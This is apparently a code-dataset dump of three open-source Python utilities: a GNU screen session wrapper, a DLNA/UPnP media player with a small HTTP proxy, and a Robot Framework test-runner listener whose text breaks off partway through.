source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
screen.py
|
# This file is modified from the screenutils Python module
# https://pypi.org/project/screenutils/
# https://github.com/Christophe31/screenutils
# -*- coding:utf-8 -*-
#
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the GNU Public License 2 or upper.
# Please ask if you wish a more permissive license.
try:
from commands import getoutput
except Exception:
from subprocess import getoutput
from os import system
from time import sleep
class ScreenNotFoundError(Exception):
"""Raised when the screen does not exists."""
def __init__(self, message, screen_name):
message += " Screen \"{0}\" not found".format(screen_name)
self.screen_name = screen_name
super(ScreenNotFoundError, self).__init__(message)
def list_screens():
"""List all the existing screens and build a Screen instance for each."""
list_cmd = "screen -ls"
return [
Screen(".".join(l.split(".")[1:]).split("\t")[0])
for l in getoutput(list_cmd).split('\n')
if "\t" in l and ".".join(l.split(".")[1:]).split("\t")[0]
]
class Screen(object):
"""Represents a gnu-screen object.
>>> s=Screen("screenName", initialize=True)
>>> s.name
'screenName'
>>> s.exists
True
>>> s.state
>>> s.send_commands("man -k keyboard")
>>> s.kill()
>>> s.exists
False
"""
def __init__(self, name, initialize=False):
self.name = name
self._id = None
self._status = None
if initialize:
self.initialize()
@property
def id(self):
"""Return the identifier of the screen as string."""
if not self._id:
self._set_screen_infos()
return self._id
@property
def status(self):
"""Return the status of the screen as string."""
self._set_screen_infos()
return self._status
@property
def exists(self):
"""Tell if the screen session exists or not."""
# Parse the screen -ls call, to find if the screen exists or not.
# " 28062.G.Terminal (Detached)"
lines = getoutput("screen -ls").split('\n')
return self.name in [
".".join(l.split(".")[1:]).split("\t")[0]
for l in lines
if self.name in l
]
def initialize(self):
"""Initialize a screen, if does not exists yet."""
if not self.exists:
self._id = None
# Detach the screen once attached, on a new tread.
# support Unicode (-U),
# attach to a new/existing named screen (-R).
# ORIGINAL
# Thread(target=self._delayed_detach).start()
# system('screen -s sh -UR -S ' + self.name)
# CUSTOM
system('screen -d -m -S ' + self.name)
def interrupt(self):
"""Insert CTRL+C in the screen session."""
self._screen_commands("eval \"stuff \\003\"")
def kill(self):
"""Kill the screen applications then close the screen."""
self._screen_commands('quit')
def detach(self):
"""Detach the screen."""
self._check_exists()
system("screen -d " + self.id)
def send_commands(self, *commands):
"""Send commands to the active gnu-screen."""
self._check_exists()
for command in commands:
# use single quote unless that is a part of the command
if "'" in command:
q = "\""
else:
q = "\'"
self._screen_commands(
'stuff {q}{c}{q}'.format(q=q, c=command),
'eval "stuff \\015"'
)
def add_user_access(self, unix_user_name):
"""Allow to share your session with an other unix user."""
self._screen_commands('multiuser on', 'acladd ' + unix_user_name)
def _screen_commands(self, *commands):
"""Allow to insert generic screen specific commands."""
self._check_exists()
for command in commands:
cmd = 'screen -x {0}.{1} -p 0 -X {2}'.format(self.id, self.name, command)
system(cmd)
sleep(0.02)
def _check_exists(self, message="Error code: 404."):
"""Check whereas the screen exist. if not, raise an exception."""
if not self.exists:
raise ScreenNotFoundError(message, self.name)
def _set_screen_infos(self):
"""Set the screen information related parameters."""
if self.exists:
line = ""
for l in getoutput("screen -ls").split("\n"):
if (
l.startswith('\t') and
self.name in l and
self.name == ".".join(l.split('\t')[1].split('.')[1:]) in l
):
line = l
if not line:
raise ScreenNotFoundError("While getting info.", self.name)
infos = line.split('\t')[1:]
self._id = infos[0].split('.')[0]
if len(infos) == 3:
self._date = infos[1][1:-1]
self._status = infos[2][1:-1]
else:
self._status = infos[1][1:-1]
def _delayed_detach(self):
sleep(0.5)
self.detach()
def __repr__(self):
return "<%s '%s'>" % (self.__class__.__name__, self.name)
|
dlnap.py
|
#!/usr/bin/python
# @file dlnap.py
# @author cherezov.pavel@gmail.com
# @brief Python over the network media player to playback on DLNA UPnP devices.
# Change log:
# 0.1 initial version.
# 0.2 device renamed to DlnapDevice; DLNAPlayer is disappeared.
# 0.3 debug output is added. Extract location url fixed.
# 0.4 compatible discover mode added.
# 0.5 xml parser introduced for device descriptions
# 0.6 xpath introduced to navigate over xml dictionary
# 0.7 device ip argument introduced
# 0.8 debug output is replaced with standard logging
# 0.9 pause/stop added. Video playback tested on Samsung TV
# 0.10 proxy (draft) is introduced.
# 0.11 sync proxy for py2 and py3 implemented, --proxy-port added
# 0.12 local files can be played as well now via proxy
# 0.13 ssdp protocol version argument added
# 0.14 fixed bug with receiving responses from device
#
# 1.0 moved from idea version
__version__ = "0.14"
import logging
import mimetypes
import os
import re
import select
import shutil
import socket
import sys
import threading
import time
import traceback
from contextlib import contextmanager
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from urllib.request import Request
from urllib.request import urlopen
import xmltodict
SSDP_GROUP = ("239.255.255.250", 1900)
URN_AVTransport = "urn:schemas-upnp-org:service:AVTransport:1"
URN_AVTransport_Fmt = "urn:schemas-upnp-org:service:AVTransport:{}"
URN_RenderingControl = "urn:schemas-upnp-org:service:RenderingControl:1"
# URN_RenderingControl_Fmt = "urn:schemas-upnp-org:service:RenderingControl:{}"
SSDP_ALL = "ssdp:all"
# =================================================================================================
# PROXY
#
running = False
class DownloadProxy(BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def log_request(self, code='-', size='-'):
pass
def response_success(self):
url = self.path[1:] # replace '/'
if os.path.exists(url):
f = open(url)
content_type = mimetypes.guess_type(url)[0]
else:
f = urlopen(url=url)
content_type = f.getheader("Content-Type")
self.send_response(200, "ok")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Content-Type")
self.send_header("Content-Type", content_type)
self.end_headers()
def do_OPTIONS(self):
self.response_success()
def do_HEAD(self):
self.response_success()
def do_GET(self):
global running
url = self.path[1:] # replace '/'
content_type = ''
if os.path.exists(url):
f = open(url)
content_type = mimetypes.guess_type(url)[0]
size = os.path.getsize(url)
elif not url or not url.startswith('http'):
self.response_success()
return
else:
f = urlopen(url=url)
try:
if not content_type:
content_type = f.getheader("Content-Type")
size = f.getheader("Content-Length")
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header("Content-Type", content_type)
self.send_header("Content-Disposition",
'attachment; filename="{}"'.format(os.path.basename(url)))
self.send_header("Content-Length", str(size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
finally:
running = False
f.close()
def runProxy(ip='', port=8000):
global running
running = True
DownloadProxy.protocol_version = "HTTP/1.0"
httpd = HTTPServer((ip, port), DownloadProxy)
while running:
httpd.handle_request()
#
# PROXY
# =================================================================================================
def _get_port(location):
""" Extract port number from url.
location -- string like http://anyurl:port/whatever/path
return -- port number
"""
port = re.findall('http://.*?:(\d+).*', location)
return int(port[0]) if port else 80
def _get_control_urls(xml):
""" Extract AVTransport contol url from device description xml
xml -- device description xml
return -- control url or empty string if wasn't found
"""
try:
return {i['serviceType']: i['controlURL'] for i in
xml['root']['device']['serviceList']['service']}
except:
return
@contextmanager
def _send_udp(to, packet):
""" Send UDP message to group
to -- (host, port) group to send the packet to
packet -- message to send
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.sendto(packet.encode(), to)
yield sock
sock.close()
def _unescape_xml(xml):
""" Replace escaped xml symbols with real ones.
"""
return xml.decode().replace('<', '<').replace('>', '>').replace('"', '"')
def _get_location_url(raw):
""" Extract device description url from discovery response
raw -- raw discovery response
return -- location url string
"""
t = re.findall('\n(?i)location:\s*(.*)\r\s*', raw, re.M)
if len(t) > 0:
return t[0]
return ''
def _get_friendly_name(xml):
""" Extract device name from description xml
xml -- device description xml
return -- device name
"""
try:
return xml['root']['device']['friendlyName']
except Exception as e:
return 'Unknown'
class DlnapDevice:
""" Represents DLNA/UPnP device.
"""
def __init__(self, raw, ip):
self.__logger = logging.getLogger(self.__class__.__name__)
self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))
self.ip = ip
self.ssdp_version = 1
self.port = None
self.name = 'Unknown'
self.control_url = None
self.rendering_control_url = None
self.has_av_transport = False
try:
self.__raw = raw.decode()
self.location = _get_location_url(self.__raw)
self.__logger.info('location: {}'.format(self.location))
self.port = _get_port(self.location)
self.__logger.info('port: {}'.format(self.port))
raw_desc_xml = urlopen(self.location, timeout=5).read().decode()
desc_dict = xmltodict.parse(raw_desc_xml)
self.__logger.debug('description xml: {}'.format(desc_dict))
self.name = _get_friendly_name(desc_dict)
self.__logger.info('friendlyName: {}'.format(self.name))
services_url = _get_control_urls(desc_dict)
self.control_url = services_url[URN_AVTransport]
self.__logger.info('control_url: {}'.format(self.control_url))
self.rendering_control_url = services_url[URN_RenderingControl]
self.__logger.info('rendering_control_url: {}'.format(self.rendering_control_url))
self.has_av_transport = self.control_url is not None
self.__logger.info('=> Initialization completed'.format(ip))
except Exception as e:
self.__logger.warning(
'DlnapDevice (ip = {}) init exception:\n{}'.format(ip, traceback.format_exc()))
def __repr__(self):
return '{} @ {}'.format(self.name, self.ip)
def __eq__(self, d):
return self.name == d.name and self.ip == d.ip
@staticmethod
def _payload_from_template(action, data, urn):
""" Assembly payload from template.
"""
fields = ''
for tag, value in data.items():
fields += '<{tag}>{value}</{tag}>'.format(tag=tag, value=value)
payload = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:{action} xmlns:u="{urn}">
{fields}
</u:{action}>
</s:Body>
</s:Envelope>""".format(action=action, urn=urn, fields=fields)
return payload
def _soap_request(self, action, data):
""" Send SOAP Request to DMR devices
action -- control action
data -- dictionary with XML fields value
"""
if not self.control_url:
return None
if action in ["SetVolume", "SetMute", "GetVolume"]:
url = self.rendering_control_url
# urn = URN_RenderingControl_Fmt.format(self.ssdp_version)
urn = URN_RenderingControl
else:
url = self.control_url
urn = URN_AVTransport_Fmt.format(self.ssdp_version)
soap_url = 'http://{}:{}{}'.format(self.ip, self.port, url)
headers = {'Content-type': 'text/xml',
'SOAPACTION': '"{}#{}"'.format(urn, action),
'charset': 'utf-8',
'User-Agent': '{}/{}'.format(__file__, __version__)}
self.__logger.debug(headers)
payload = self._payload_from_template(action=action, data=data, urn=urn)
self.__logger.debug(payload)
try:
req = Request(soap_url, data=payload.encode(), headers=headers)
res = urlopen(req, timeout=5)
if res.code == 200:
data = res.read()
self.__logger.debug(data.decode())
# response = xmltodict.parse(data)
response = xmltodict.parse(_unescape_xml(data))
try:
error_description = \
response['s:Envelope']['s:Body']['s:Fault']['detail']['UPnPError'][
'errorDescription']
logging.error(error_description)
return None
except:
return response
except Exception as e:
logging.error(e)
def set_current_media(self, url, instance_id=0):
""" Set media to playback.
url -- media url
instance_id -- device instance id
"""
response = self._soap_request('SetAVTransportURI',
{'InstanceID': instance_id, 'CurrentURI': url,
'CurrentURIMetaData': ''})
try:
response['s:Envelope']['s:Body']['u:SetAVTransportURIResponse']
return True
except:
# Unexpected response
return False
def play(self, instance_id=0, speed=1):
""" Play media that was already set as current.
instance_id -- device instance id
"""
response = self._soap_request('Play', {'InstanceID': instance_id, 'Speed': speed})
try:
response['s:Envelope']['s:Body']['u:PlayResponse']
return True
except:
# Unexpected response
return False
def pause(self, instance_id=0):
""" Pause media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('Pause', {'InstanceID': instance_id, 'Speed': 1})
try:
response['s:Envelope']['s:Body']['u:PauseResponse']
return True
except:
# Unexpected response
return False
def stop(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('Stop', {'InstanceID': instance_id, 'Speed': 1})
try:
response['s:Envelope']['s:Body']['u:StopResponse']
return True
except:
# Unexpected response
return False
def seek(self, position, instance_id=0):
"""
Seek position
"""
response = self._soap_request('Seek', {'InstanceID': instance_id, 'Unit': 'REL_TIME',
'Target': position})
try:
response['s:Envelope']['s:Body']['u:SeekResponse']
return True
except:
# Unexpected response
return False
def volume(self, volume=10, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetVolume',
{'InstanceID': instance_id, 'DesiredVolume': volume,
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetVolumeResponse']
return True
except:
# Unexpected response
return False
def get_volume(self, instance_id=0):
"""
get volume
"""
response = self._soap_request('GetVolume', {'InstanceID': instance_id, 'Channel': 'Master'})
if response:
return response['s:Envelope']['s:Body']['u:GetVolumeResponse']['CurrentVolume']
def mute(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetMute', {'InstanceID': instance_id, 'DesiredMute': '1',
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetMuteResponse']
return True
except:
# Unexpected response
return False
def unmute(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetMute', {'InstanceID': instance_id, 'DesiredMute': '0',
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetMuteResponse']
return True
except:
# Unexpected response
return False
def info(self, instance_id=0):
""" Transport info.
instance_id -- device instance id
"""
response = self._soap_request('GetTransportInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetTransportInfoResponse'])
def media_info(self, instance_id=0):
""" Media info.
instance_id -- device instance id
"""
response = self._soap_request('GetMediaInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetMediaInfoResponse'])
def position_info(self, instance_id=0):
""" Position info.
instance_id -- device instance id
"""
response = self._soap_request('GetPositionInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetPositionInfoResponse'])
def set_next(self, url, instance_id=0):
""" Set next media to playback.
url -- media url
instance_id -- device instance id
"""
response = self._soap_request('SetNextAVTransportURI',
{'InstanceID': instance_id, 'NextURI': url,
'NextURIMetaData': ''})
try:
response['s:Envelope']['s:Body']['u:SetNextAVTransportURIResponse']
return True
except:
# Unexpected response
return False
def next(self, instance_id=0):
""" Play media that was already set as next.
instance_id -- device instance id
"""
response = self._soap_request('Next', {'InstanceID': instance_id})
try:
response['s:Envelope']['s:Body']['u:NextResponse']
return True
except:
# Unexpected response
return False
def discover(name='', ip='', timeout=1, st=SSDP_ALL, mx=3, ssdp_version=1):
""" Discover UPnP devices in the local network.
name -- name or part of the name to filter devices
timeout -- timeout to perform discover
st -- st field of discovery packet
mx -- mx field of discovery packet
return -- list of DlnapDevice
"""
st = st.format(ssdp_version)
payload = "\r\n".join([
'M-SEARCH * HTTP/1.1',
'User-Agent: {}/{}'.format(__file__, __version__),
'HOST: {}:{}'.format(*SSDP_GROUP),
'Accept: */*',
'MAN: "ssdp:discover"',
'ST: {}'.format(st),
'MX: {}'.format(mx),
'',
''])
devices = []
with _send_udp(SSDP_GROUP, payload) as sock:
start = time.time()
while True:
if time.time() - start > timeout:
# timed out
break
r, w, x = select.select([sock], [], [sock], 1)
if sock in r:
data, addr = sock.recvfrom(1024)
if ip and addr[0] != ip:
continue
d = DlnapDevice(data, addr[0])
d.ssdp_version = ssdp_version
if d not in devices:
if not name or name is None or name.lower() in d.name.lower():
if not ip:
devices.append(d)
elif d.has_av_transport:
# no need in further searching by ip
devices.append(d)
break
elif sock in x:
raise Exception('Getting response failed')
else:
# Nothing to read
pass
return devices
if __name__ == '__main__':
import getopt
def usage():
print(
'{} [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>] [--pause] [--stop] [--proxy]'.format(
__file__))
print(' --ip <device ip> - ip address for faster access to the known device')
print(
' --device <device name or part of the name> - discover devices with this name as substring')
print(
' --all - flag to discover all upnp devices, not only devices with AVTransport ability')
print(
' --play <url> - set current url for play and start playback it. In case of url is empty - continue playing recent media.')
print(' --pause - pause current playback')
print(' --stop - stop current playback')
print(' --mute - mute playback')
print(' --unmute - unmute playback')
print(' --volume <vol> - set current volume for playback')
print(' --seek <position in HH:MM:SS> - set current position for playback')
print(' --timeout <seconds> - discover timeout')
print(' --ssdp-version <version> - discover devices by protocol version, default 1')
print(' --proxy - use local proxy on proxy port')
print(
' --proxy-port <port number> - proxy port to listen incomming connections from devices, default 8000')
print(' --help - this help')
def version():
print(__version__)
try:
opts, args = getopt.getopt(sys.argv[1:], "hvd:t:i:", [ # information arguments
'help',
'version',
'log=',
# device arguments
'device=',
'ip=',
# action arguments
'play=',
'pause',
'stop',
'volume=',
'mute',
'unmute',
'seek=',
# discover arguments
'list',
'all',
'timeout=',
'ssdp-version=',
# transport info
'info',
'media-info',
# download proxy
'proxy',
'proxy-port='])
except getopt.GetoptError:
usage()
sys.exit(1)
device = ''
url = ''
vol = 10
position = '00:00:00'
timeout = 1
action = ''
logLevel = logging.WARN
compatibleOnly = True
ip = ''
proxy = False
proxy_port = 8000
ssdp_version = 1
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit(0)
elif opt in ('-v', '--version'):
version()
sys.exit(0)
elif opt in ('--log'):
if arg.lower() == 'debug':
logLevel = logging.DEBUG
elif arg.lower() == 'info':
logLevel = logging.INFO
elif arg.lower() == 'warn':
logLevel = logging.WARN
elif opt in ('--all'):
compatibleOnly = False
elif opt in ('-d', '--device'):
device = arg
elif opt in ('-t', '--timeout'):
timeout = float(arg)
elif opt in ('--ssdp-version'):
ssdp_version = int(arg)
elif opt in ('-i', '--ip'):
ip = arg
compatibleOnly = False
timeout = 10
elif opt in ('--list'):
action = 'list'
elif opt in ('--play'):
action = 'play'
url = arg
elif opt in ('--pause'):
action = 'pause'
elif opt in ('--stop'):
action = 'stop'
elif opt in ('--volume'):
action = 'volume'
vol = arg
elif opt in ('--seek'):
action = 'seek'
position = arg
elif opt in ('--mute'):
action = 'mute'
elif opt in ('--unmute'):
action = 'unmute'
elif opt in ('--info'):
action = 'info'
elif opt in ('--media-info'):
action = 'media-info'
elif opt in ('--proxy'):
proxy = True
elif opt in ('--proxy-port'):
proxy_port = int(arg)
logging.basicConfig(level=logLevel)
st = URN_AVTransport_Fmt if compatibleOnly else SSDP_ALL
allDevices = discover(name=device, ip=ip, timeout=timeout, st=st, ssdp_version=ssdp_version)
if not allDevices:
print('No compatible devices found.')
sys.exit(1)
if action in ('', 'list'):
print('Discovered devices:')
for d in allDevices:
print(' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))
sys.exit(0)
d = allDevices[0]
print(d)
if url.lower().replace('https://', '').replace('www.', '').startswith('youtube.'):
import subprocess
process = subprocess.Popen(['youtube-dl', '-g', url], stdout=subprocess.PIPE)
url, err = process.communicate()
if url.lower().startswith('https://'):
proxy = True
if proxy:
ip = socket.gethostbyname(socket.gethostname())
t = threading.Thread(target=runProxy, kwargs={'ip': ip, 'port': proxy_port})
t.start()
time.sleep(2)
if action == 'play':
try:
d.stop()
url = 'http://{}:{}/{}'.format(ip, proxy_port, url) if proxy else url
d.set_current_media(url=url)
d.play()
except Exception as e:
print('Device is unable to play media.')
logging.warn('Play exception:\n{}'.format(traceback.format_exc()))
sys.exit(1)
elif action == 'pause':
d.pause()
elif action == 'stop':
d.stop()
elif action == 'volume':
d.volume(vol)
elif action == 'seek':
d.seek(position)
elif action == 'mute':
d.mute()
elif action == 'unmute':
d.unmute()
elif action == 'info':
print(d.info())
elif action == 'media-info':
print(d.media_info())
if proxy:
t.join()
|
TestRunnerAgent.py
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Mikko Korpela under NSN copyrights
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Ammended by Timothy Alexander <dragonfyre13@gmail.com>
# (StreamHandler class added)
# Copyright 2013 Timothy Alexander
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Modified by Mateusz Marzec under NSN copyrights
# Copyright 2015 Nokia Solutions and Networks
# * Licensed under the Apache License, Version 2.0,
# * see license.txt file for details.
#
# Ammended by Helio Guilherme <helioxentric@gmail.com>
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Robot Framework listener that sends information to a socket
This uses a custom streamhandler module, preferring json but sending either
json or pickle to send objects to the listening server. It should probably be
refactored to call an XMLRPC server.
"""
import copy
import os
import platform
import sys
import socket
import threading
PLATFORM = platform.python_implementation()
PY2 = sys.version_info[0] == 2
PY3 = not PY2
try:
import SocketServer
except ImportError: #py3
try:
import socketserver as SocketServer
except ImportError as e:
raise e
try:
# to find robot (we use provided lib)
sys.path.append(os.path.join(os.path.dirname(__file__), '../../lib'))
from robot.errors import ExecutionFailed
from robot.running import EXECUTION_CONTEXTS
from robot.running.signalhandler import STOP_SIGNAL_MONITOR
from robot.utils import encoding
from robot.utils.encoding import SYSTEM_ENCODING
except ImportError:
encoding = None
# print("TestRunnerAgent: Maybe you did not installed RIDE under this Python?") # DEBUG
raise # DEBUG
# print("DEBUG: console %s system %s" % (encoding.CONSOLE_ENCODING, encoding.SYSTEM_ENCODING))
if sys.hexversion > 0x2060000:
import json
_JSONAVAIL = True
else:
try:
import simplejson as json
_JSONAVAIL = True
except ImportError:
_JSONAVAIL = False
try:
import cPickle as pickle
except ImportError: # py3
import pickle as pickle
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError: # py3
from io import StringIO
HOST = "localhost"
# Setting Output encoding to UTF-8 and ignoring the platform specs
# RIDE will expect UTF-8
# Set output encoding to UTF-8 for piped output streams
# DEBUG This was working in Linux always!
#if encoding:
# encoding.OUTPUT_ENCODING = 'UTF-8'
# print("DEBUG: TestRunnerAgent encoding %s\n" % SYSTEM_ENCODING )
def _is_logged(level):
current = EXECUTION_CONTEXTS.current
if current is None:
return True
out = current.output
if out is None:
return True
return out._xmllogger._log_message_is_logged(level)
class TestRunnerAgent:
"""Pass all listener events to a remote listener
If called with one argument, that argument is a port
If called with two, the first is a hostname, the second is a port
"""
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, *args):
self.port = int(args[0])
self.host = HOST
self.sock = None
self.filehandler = None
self.streamhandler = None
self._connect()
self._send_pid()
self._create_debugger((len(args) >= 2) and (args[1] == 'True'))
self._create_kill_server()
print("TestRunnerAgent: Running under %s %s\n" %
(PLATFORM, sys.version.split()[0]))
def _create_debugger(self, pause_on_failure):
self._debugger = RobotDebugger(pause_on_failure)
def _create_kill_server(self):
self._killer = RobotKillerServer(self._debugger)
self._server_thread = threading.Thread(
target=self._killer.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
self._send_server_port(self._killer.server_address[1])
def _send_pid(self):
self._send_socket("pid", os.getpid())
def _send_server_port(self, port):
self._send_socket("port", port)
def start_test(self, name, attrs):
self._send_socket("start_test", name, attrs)
def end_test(self, name, attrs):
self._send_socket("end_test", name, attrs)
def start_suite(self, name, attrs):
attrs_copy = copy.copy(attrs)
del attrs_copy['doc']
attrs_copy['is_dir'] = os.path.isdir(attrs['source'])
self._send_socket("start_suite", name, attrs_copy)
def end_suite(self, name, attrs):
attrs_copy = copy.copy(attrs)
del attrs_copy['doc']
attrs_copy['is_dir'] = os.path.isdir(attrs['source'])
self._send_socket("end_suite", name, attrs_copy)
def start_keyword(self, name, attrs):
# pass empty args, see https://github.com/nokia/RED/issues/32
# we're cutting args from original attrs dict, because it may contain
# objects which are not json-serializable and we don't need them anyway
attrs_copy = copy.copy(attrs)
del attrs_copy['args']
del attrs_copy['doc']
del attrs_copy['assign']
self._send_socket("start_keyword", name, attrs_copy)
if self._debugger.is_breakpoint(name, attrs): # must check original
self._debugger.pause()
paused = self._debugger.is_paused()
if paused:
self._send_socket('paused')
self._debugger.start_keyword()
if paused:
self._send_socket('continue')
def end_keyword(self, name, attrs):
# pass empty args, see https://github.com/nokia/RED/issues/32
attrs_copy = copy.copy(attrs)
del attrs_copy['args']
del attrs_copy['doc']
del attrs_copy['assign']
self._send_socket("end_keyword", name, attrs_copy)
self._debugger.end_keyword(attrs['status'] == 'PASS')
def message(self, message):
pass
def log_message(self, message):
if _is_logged(message['level']):
self._send_socket("log_message", message)
def log_file(self, path):
self._send_socket("log_file", path)
def output_file(self, path):
pass
def report_file(self, path):
self._send_socket("report_file", path)
def summary_file(self, path):
pass
def debug_file(self, path):
pass
def close(self):
self._send_socket("close")
if self.sock:
self.filehandler.close()
self.sock.close()
def _connect(self):
"""Establish a connection for sending data"""
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
# Iron python does not return right object type if not binary mode
self.filehandler = self.sock.makefile('wb')
self.streamhandler = StreamHandler(self.filehandler)
except socket.error as e:
print('unable to open socket to "%s:%s" error: %s'
% (self.host, self.port, str(e)))
self.sock = None
self.filehandler = None
def _send_socket(self, name, *args):
try:
if self.filehandler:
packet = (name, args)
self.streamhandler.dump(packet)
self.filehandler.flush()
except Exception:
import traceback
traceback.print_exc(file=sys.stdout)
sys.stdout.flush()
raise
class RobotDebugger(object):
def __init__(self, pause_on_failure=False):
self._state = 'running'
self._keyword_level = 0
self._pause_when_on_level = -1
self._pause_on_failure = pause_on_failure
self._resume = threading.Event()
@staticmethod
def is_breakpoint(name, attrs):
if len(attrs['args']) > 0:
return name == 'BuiltIn.Comment' and \
str(attrs['args'][0]).upper().startswith(u"PAUSE")
def pause(self):
self._resume.clear()
self._state = 'pause'
def pause_on_failure(self, pause):
self._pause_on_failure = pause
def resume(self):
self._state = 'running'
self._pause_when_on_level = -1
self._resume.set()
def step_next(self):
self._state = 'step_next'
self._resume.set()
def step_over(self):
self._state = 'step_over'
self._resume.set()
def start_keyword(self):
while self._state == 'pause':
self._resume.wait()
self._resume.clear()
if self._state == 'step_next':
self._state = 'pause'
elif self._state == 'step_over':
self._pause_when_on_level = self._keyword_level
self._state = 'resume'
self._keyword_level += 1
def end_keyword(self, passed=True):
self._keyword_level -= 1
if self._keyword_level == self._pause_when_on_level or\
(self._pause_on_failure and not passed):
self._state = 'pause'
def is_paused(self):
return self._state == 'pause'
class RobotKillerServer(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, debugger):
SocketServer.TCPServer.__init__(self, ("", 0), RobotKillerHandler)
self.debugger = debugger
class RobotKillerHandler(SocketServer.StreamRequestHandler):
def handle(self):
data = self.request.makefile('r').read().strip()
if data == 'kill':
self._signal_kill()
elif data == 'pause':
self.server.debugger.pause()
elif data == 'resume':
self.server.debugger.resume()
elif data == 'step_next':
self.server.debugger.step_next()
elif data == 'step_over':
self.server.debugger.step_over()
elif data == 'pause_on_failure':
self.server.debugger.pause_on_failure(True)
elif data == 'do_not_pause_on_failure':
self.server.debugger.pause_on_failure(False)
@staticmethod
def _signal_kill():
try:
STOP_SIGNAL_MONITOR(1, '')
except ExecutionFailed:
pass
# NOTE: Moved to bottom of TestRunnerAgent per feedback in pull request,
# so jybot doesn't encounter issues. Special imports at top of file.
class StreamError(Exception):
"""
Base class for EncodeError and DecodeError
"""
pass
class EncodeError(StreamError):
"""
This exception is raised when an unencodable object is passed to the
dump() method or function.
"""
wrapped_exceptions = (pickle.PicklingError, )
class DecodeError(StreamError):
"""
This exception is raised when there is a problem decoding an object,
such as a security violation.
Note that other exceptions may also be raised during decoding, including
AttributeError, EOFError, ImportError, and IndexError.
"""
# NOTE: No JSONDecodeError in json in stdlib for python >= 2.6
wrapped_exceptions = (pickle.UnpicklingError,)
if _JSONAVAIL:
if hasattr(json, 'JSONDecodeError'):
wrapped_exceptions = (pickle.UnpicklingError, json.JSONDecodeError)
def dump(obj, fp):
StreamHandler(fp).dump(obj)
def load(fp):
return StreamHandler(fp).load()
def dumps(obj):
"""
Similar method to json dumps, prepending data with message length
header. Replaces pickle.dumps, so can be used in place without
the memory leaks on receiving side in pickle.loads (related to
memoization of data)
NOTE: Protocol is ignored when json representation is used
"""
fp = StringIO()
StreamHandler(fp).dump(obj)
return fp.getvalue()
def loads(s):
"""
Reads in json message or pickle message prepended with message length
header from a string. Message is expected to be encoded by this class as
well, to have same message length header type.
Specifically replaces pickle.loads as that function/method has serious
memory leak issues with long term use of same Unpickler object for
encoding data to send, specifically related to memoization of data to
encode.
"""
fp = StringIO(s)
return StreamHandler(fp).load()
class StreamHandler(object):
"""
This class provides a common streaming approach for the purpose
of reliably sending data over a socket interface. Replaces usage of
Unpickler.load where possible with JSON format prepended by message length
header. Uses json in python stdlib (in python >= 2.6) or simplejson (in
python < 2.6). If neither are available, falls back to pickle.Pickler and
pickle.Unpickler, attempting to eliminate memory leakage where possible at
